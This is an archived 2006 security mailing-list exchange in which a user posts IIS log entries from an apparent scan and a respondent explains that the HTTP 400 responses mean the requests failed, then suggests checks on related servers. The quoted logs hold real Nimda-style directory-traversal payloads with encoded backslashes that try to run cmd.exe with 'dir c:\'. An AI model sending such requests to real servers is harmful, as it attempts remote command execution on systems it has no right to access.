RE: IIS http error log entries...



Since your IIS Server responded with HTTP 400 responses, there's not
reason to panic. However should consider doing some further
investigation.
From a web server standpoint, you'll have reason to be concerned if your
IIS Server is generating HTTP 200 responses to requests that it's not
intended to serve, but from the snippet you provided below, that's not
the case.

A few thoughts off the top of my head to consider.
Has your company hired someone to perform a penetration test? (based on
the fact that the source IP coming from the Netherlands, the pen. test
theory is not likely)
It seems that this IIS Server is hosting an Internet site, is it on a
protected subnet within your network (DMZ), what else is on that subnet?
Is this Server hosting anything other than IIS? you'll probably want to
comb through more logs on that system and potentially on other servers
that have public exposure (Such as SMTP, DNS, other web servers, etc.)
Do your public DNS servers allow domain transfers to anyone on the
internet? If so consider looking at each of those servers as well, or
contact the administrators of those servers if they are not your
responsibility.

-Cheers



-----Original Message-----
From: listbounce@xxxxxxxxxxxxxxxxx [mailto:listbounce@xxxxxxxxxxxxxxxxx]
On Behalf Of nemanja.janic@xxxxxxxxxxxxxxxxxxxx
Sent: Tuesday, December 12, 2006 10:02 AM
To: focus-ms@xxxxxxxxxxxxxxxxx
Subject: IIS http error log entries...

Hello list,
i hope i got the right group,
i just found these in my IIS logs:

-----------------------

2006-12-08 11:38:18 87.17.7.5 2842 192.168.x.x 80 HTTP/1.0 HEAD
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\
400 - URL -
2006-12-08 11:38:29 87.17.7.5 2929 192.168.x.x 80 HTTP/1.0 HEAD
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 -
URL -
2006-12-08 11:38:44 87.17.7.5 2872 192.168.x.x 80 HTTP/1.0 HEAD
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+c:\ 400 -
URL -
2006-12-08 11:38:44 87.17.7.5 3420 192.168.x.x 80 HTTP/1.0 HEAD
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 1332 192.168.x.x 80 HTTP/1.0 HEAD
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32
/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:38:58 87.17.7.5 2105 192.168.x.x 80 HTTP/1.0 HEAD
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/
c+dir+c:\ 400 - URL -
2006-12-08 11:39:46 87.17.7.5 2435 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:40:36 87.17.7.5 1933 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:40:41 87.17.7.5 4144 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:40:44 87.17.7.5 4234 192.168.x.x 80 HTTP/1.0 HEAD
/msaDC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+c:\ 400
- URL -
2006-12-08 11:40:50 87.17.7.5 1130 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
+c:\ 400 - URL -
2006-12-08 11:40:50 87.17.7.5 1411 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+c:\
400 - URL -
2006-12-08 11:41:11 87.17.7.5 1427 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:41:24 87.17.7.5 4715 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir+c:\ 400 - URL -
2006-12-08 11:41:35 87.17.7.5 1568 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%c1%pc../..%c1%pc../..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:
\ 400 - URL -
2006-12-08 11:41:41 87.17.7.5 4751 192.168.x.x 80 - - - - -
Timer_MinBytesPerSecond -
2006-12-08 11:41:44 87.17.7.5 1595 192.168.x.x 80 HTTP/1.0 HEAD
/msadc/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c:\ 400 - URL -

-------------------------

I don't have much expirience with this kind of thing, and from digging
the net i found that this was used in Nimda attacks few years ago... any
idea what's going on? Should i be worried?

------------------------------------------------------------------------
---
------------------------------------------------------------------------
---





Blue Cross Blue Shield of Florida, Inc., and its subsidiary and affiliate companies are not responsible for errors or omissions in this e-mail message. Any personal comments made in this e-mail do not reflect the views of Blue Cross Blue Shield of Florida, Inc. The information contained in this document may be confidential and intended solely for the use of the individual or entity to whom it is addressed. This document may contain material that is privileged or protected from disclosure under applicable law. If you are not the intended recipient or the individual responsible for delivering to the intended recipient, please (1) be advised that any use, dissemination, forwarding, or copying of this document IS STRICTLY PROHIBITED; and (2) notify sender immediately by telephone and destroy the document. THANK YOU.


---------------------------------------------------------------------------
---------------------------------------------------------------------------



Relevant Pages

  • IIS und Netmeeting Problem
    ... DYNDNS weiterleitung für Namensauflösung über Internet ... Outlook 2003 über IIS http server für Kalenderabstimmung ... IIS Server http läuft auf Port 80. ...
    (microsoft.public.de.german.windowsxp.applications)
  • IIS Server und Netmeeting Problem
    ... DYNDNS weiterleitung für Namensauflösung über Internet ... Outlook 2003 über IIS http server für Kalenderabstimmung ... IIS Server http läuft auf Port 80. ...
    (microsoft.public.de.german.windowsxp.hardware)
  • IIS Server und Netmeeting Problem
    ... DYNDNS weiterleitung für Namensauflösung über Internet ... Outlook 2003 über IIS http server für Kalenderabstimmung ... IIS Server http läuft auf Port 80. ...
    (microsoft.public.de.german.windowsxp.gruppen.richtlinien)
  • IIS Server und Netmeeting Problem
    ... DYNDNS weiterleitung für Namensauflösung über Internet ... Outlook 2003 über IIS http server für Kalenderabstimmung ... IIS Server http läuft auf Port 80. ...
    (microsoft.public.de.german.windowsxp.multimedia)
  • Re: Getting attacked on port(s) 53, 139, 445 & 1433???
    ... the traffic is originating from your IIS server, ... If you can confirm that the traffic is really coming from your IIS server, ... Note that successful IIS buffer overflow attacks don't show up in the IIS ... > these ports is because these ports are the only ones ...
    (microsoft.public.inetserver.iis.security)